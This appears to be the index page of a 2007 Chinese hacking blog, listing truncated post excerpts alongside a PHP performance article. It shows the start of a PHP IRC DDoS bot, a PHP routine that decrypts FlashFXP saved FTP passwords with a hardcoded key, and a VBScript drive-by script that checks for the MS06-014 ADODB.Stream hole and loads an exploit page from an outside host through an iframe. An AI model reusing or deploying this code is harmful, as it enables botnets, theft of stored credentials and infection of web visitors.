by luoluo
luoluonet_at_yahoo.cn
javascript函数劫持,也就是老外提到的javascript hijacking技术。
» 阅读全文
Posted by amxku on 2007-12-10, 23:27 . 技术相关
Posted by amxku on 2007-11-14, 23:17 . 技术相关
php Security-Shell RFI scanner
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* Test over by cnfjhh
» 阅读全文
Posted by amxku on 2007-11-07, 16:36 . 技术相关
» 阅读全文
Posted by amxku on 2007-10-20, 22:58 . 技术相关
<?php
/*
php ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
» 阅读全文
Posted by amxku on 2007-10-20, 22:53 . 技术相关
#!/usr/bin/perl
use LWP::Simple;
use XML::Simple;
use Term::ANSIColor;
$content = get('http://milw0rm.com/rss.php');
$xml = XMLin($content);
$num = scalar(@{$xml->{channel}->{item}});
for ($i=0; $i<$num; $i++){
print
colored("\nDate: $xml->{channel}->{item}->[$i]->{pubDate}\n", 'yellow'),
colored("\nTitle: $xml->{channel}->{item}->[$i]->{title}\n", 'green'),
colored("\nLink: $xml->{channel}->{item}->[$i]->{link}\n\n\n", 'green');
};
Posted by amxku on 2007-07-21, 21:27 . 技术相关
» 阅读全文
Tags: 代码收藏
Posted by amxku on 2007-07-09, 15:08 . 技术相关
amxku PS:一个是7j写的,一个是国外的,相比之下,国外的那个东,速度要快一些,7J可能该郁闷了。呵呵,学习学习。
function flashfxp($data)
{
$pass=substr($data, 2);
$flashfxp_key = array(y,0,A,0,3,0,6,0,z,0,A,0,4,0,8,0,d,0,E,0,h,0,f,0,r,0,v,0,g,0,h,0,G,0,R,0,g,0,5,0,7,0,h,0,5,0,U,0,l,0,D,0,v,0,3);
for ($i=0; $i < strlen($data) - 2; $i+=2)
{
$run = (Hexdec(substr($pass, $i, 2)) ^ Hexdec(DecHex(ord($flashfxp_key[$i])))) - Hexdec(substr($data, $i, 2));
if ($run < 0)
$run=$run + 255;
$Num.=chr($run);
}
return $Num;
}
» 阅读全文
Posted by amxku on 2007-06-30, 21:52 . 技术相关
56验证码
包含排干扰的算法
PS : 点阵写得很完美的东东,好好学学。
附件: 验证码识别.rar [ 44.16 K, 下载次数:423 ]
Posted by amxku on 2007-02-11, 22:43 . 杂七杂八
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
else
'msgbox "存在0614漏洞,页面转到MS0614的exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
Posted by amxku on 2006-09-13, 05:04 . 技术相关
村里版主奶瓶的好文,留下来记念他老人家。
这里所说的“大型”应用不是说像Google、eBay、Yahoo这类大型网站的具体实施,我也没有意图劝说读者放弃自己的概念和信仰,只是希望大家的系统可以运行得更快更流畅,可以承载更多的用户在线,希望可以给php的初学者一点帮助。
关于php的执行效率,网上的专题文章很多,多以php、Java几个阵营的争论开始,以一个不确定的期待结束,很少看见一个明确的结论。确实,程序的执行效率是很难从比较中得出的。应用的方面不同,执行环境不同,效率的差别会差得比较大。而且效率也是需要权衡的,大家都知道汇编语言很底层,可以写出非常高效的程序,但是我还很少,应该说是几乎没看过有人用汇编做Web开发,而且有能力用汇编写出高效程序的人似乎都是值得大家仰视的,哈哈~我们没有必要去讨论php和汇编到底差多少,只要知道自己的php和别人的PHP差多少就可以了。
» 阅读全文